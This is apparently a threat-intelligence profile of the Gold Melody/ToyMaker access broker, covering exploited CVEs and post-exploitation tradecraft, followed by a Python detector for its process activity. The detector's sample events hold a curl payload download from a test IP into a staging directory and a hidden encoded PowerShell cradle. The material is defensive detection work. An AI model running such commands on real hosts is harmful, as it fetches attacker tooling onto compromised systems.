Mallory
Financially motivated · 4 malware families · Exploits CVEs in the wild

ToyMaker

Also known as: gold_melody, goldmelody, PROPHET SPIDER, tgr_cri_0045, toymaker, UNC961

Gold Melody is a financially motivated cybercrime initial access broker (IAB) active since at least 2017. Known aliases include UNC961, Prophet Spider, ToyMaker, and TGR-CRI-0045; Unit 42 attributed TGR-CRI-0045 to Gold Melody with medium confidence. The group opportunistically scans and exploits internet-facing servers and public-facing applications to compromise networks, then hands off or sells that access to other actors, including ransomware operators. Cited reporting links the actor to access brokerage associated with CACTUS, and earlier reporting assessed that Prophet Spider likely provided access to Egregor and MountLocker operators.

Initial access has been observed through Oracle WebLogic Server vulnerabilities, including CVE-2020-14882, CVE-2020-14750, and older issues such as CVE-2016-0545, as well as SQL injection. BlackBerry also correlated Prophet Spider activity with exploitation of Log4Shell in VMware Horizon. More recently, Unit 42 reported a campaign targeting Microsoft IIS servers that abused exposed ASP.NET machine keys to sign malicious __VIEWSTATE payloads and achieve ViewState deserialization-based remote code execution; in that activity the actor executed malicious .NET assemblies in memory, reducing on-disk artifacts.

Observed post-exploitation tradecraft includes command execution from w3wp.exe, use of a consistent staging directory such as C:\Windows\Temp\111t, retrieval of tooling via curl, reflective in-memory loading of .NET modules, and a custom privilege-escalation tool named updf that leverages GodPotato to obtain SYSTEM and create local administrator accounts. The actor has also used TxPortMap for internal network discovery and performed reconnaissance with commands such as tasklist, ipconfig /all, quser, whoami /all, nltest /domain_trusts, net user, and systeminfo.

In VMware Horizon/Log4Shell-related activity associated with Prophet Spider, reporting noted ws_TomcatService.exe spawning cmd.exe or powershell.exe, encoded PowerShell download cradles, use of C:\Windows\Temp\7fde, download of wget.bin and additional payloads, registry hive dumping for credential harvesting, webshell injection into absg-worker.js, and in some cases deployment of cryptocurrency miners or Cobalt Strike. Victims named in the cited reporting include organizations in Europe and the United States across financial services, manufacturing, wholesale/retail, high technology, and transportation/logistics. The cited reporting also states that Gold Melody favors opportunistic compromise of vulnerable internet-facing infrastructure and monetizes access through downstream criminal partners.
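The process-level tradecraft described above (a web worker such as w3wp.exe or ws_TomcatService.exe spawning a shell, the named staging directories, curl retrieval of tooling, encoded PowerShell cradles, and a burst of reconnaissance commands) maps directly onto process-creation telemetry. The following is an added detection example, not code from the page or from any vendor: it runs a small set of rules over constructed sample events (the hostnames, the TEST-NET address 203.0.113.10, and the base64 string are made up for illustration) and reports per-host findings. The recon-burst threshold of three distinct commands is an assumption to tune for your environment.

```python
"""Flag Gold Melody / ToyMaker-style post-exploitation activity in process-creation events.

Added example for illustration; the sample events are constructed, not real telemetry.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (shape of a Sysmon event 1 or EDR process log)."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Web worker processes that should not normally launch interactive shells
WEB_WORKERS = {"w3wp.exe", "ws_tomcatservice.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Staging directories named in the reporting (matched case-insensitively)
STAGING_DIRS = (r"c:\windows\temp\111t", r"c:\windows\temp\7fde")
# Reconnaissance binaries listed in the reporting
RECON_COMMANDS = {"tasklist", "ipconfig", "quser", "whoami", "nltest", "net", "systeminfo"}
# PowerShell switches that carry a base64-encoded command ("-e" is broad; tune as needed)
ENCODED_FLAGS = {"-enc", "-encodedcommand", "-e", "-ec"}

# Constructed sample events: web01 shows the IIS chain, web02 the Horizon chain,
# web03 and ws07 are benign noise (a service host and an admin's single ipconfig).
SAMPLE_EVENTS = [
    ProcEvent("web01", r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c curl http://203.0.113.10/t.bin -o C:\Windows\Temp\111t\t.bin"),
    ProcEvent("web01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\whoami.exe", "whoami /all"),
    ProcEvent("web01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\nltest.exe", "nltest /domain_trusts"),
    ProcEvent("web01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe", "net user"),
    ProcEvent("web01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\tasklist.exe", "tasklist"),
    ProcEvent("web02", r"C:\Program Files\VMware\Horizon\ws_TomcatService.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc UGxhY2Vob2xkZXI="),
    ProcEvent("web03", r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs"),
    ProcEvent("ws07", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent("ws07", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> set[str]:
    """Return the set of rule tags that fire on a single event."""
    tags: set[str] = set()
    parent, image = basename(ev.parent_image), basename(ev.image)
    cmd = ev.command_line.lower()
    tokens = cmd.split()
    if parent in WEB_WORKERS and image in SHELLS:
        tags.add("web_worker_spawned_shell")
    if any(d in cmd for d in STAGING_DIRS):
        tags.add("known_staging_dir")
    if any(t in ("curl", "curl.exe") for t in tokens) and "http" in cmd:
        tags.add("curl_download")
    if image == "powershell.exe" and any(t in ENCODED_FLAGS for t in tokens):
        tags.add("encoded_powershell")
    if image.removesuffix(".exe") in RECON_COMMANDS:
        tags.add("recon_command")
    return tags


def detect(events, recon_threshold: int = 3) -> dict:
    """Aggregate tags per host; a host with >= recon_threshold distinct recon binaries is a burst."""
    per_host = defaultdict(lambda: {"tags": set(), "recon": set()})
    for ev in events:
        tags = classify(ev)
        if not tags:
            continue
        entry = per_host[ev.host]
        entry["tags"] |= tags
        if "recon_command" in tags:
            entry["recon"].add(basename(ev.image).removesuffix(".exe"))
    return {
        host: {
            "tags": sorted(e["tags"]),
            "recon": sorted(e["recon"]),
            "recon_burst": len(e["recon"]) >= recon_threshold,
        }
        for host, e in per_host.items()
    }


if __name__ == "__main__":
    for host, finding in detect(SAMPLE_EVENTS).items():
        print(host, finding)
```

A single recon command from an admin workstation (ws07) only earns a low-value `recon_command` tag, while web01 combines a web-worker shell, the named staging directory, a curl fetch and four distinct recon binaries; scoring on that combination, rather than on any one rule, is what keeps the false-positive rate tolerable on busy IIS hosts.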

Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

MITRE ATT&CK

Tradecraft

1 distinct technique observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

1 of 15 tactics, 1 technique. ×N = number of intelligence reports citing this technique.

TA0001 Initial Access (1 technique)
- T1190 Exploit Public-Facing Application
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping (1)

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal (4)

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs (3)

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables

Domains, IPs, and hashes tied to this actor, refreshed continuously.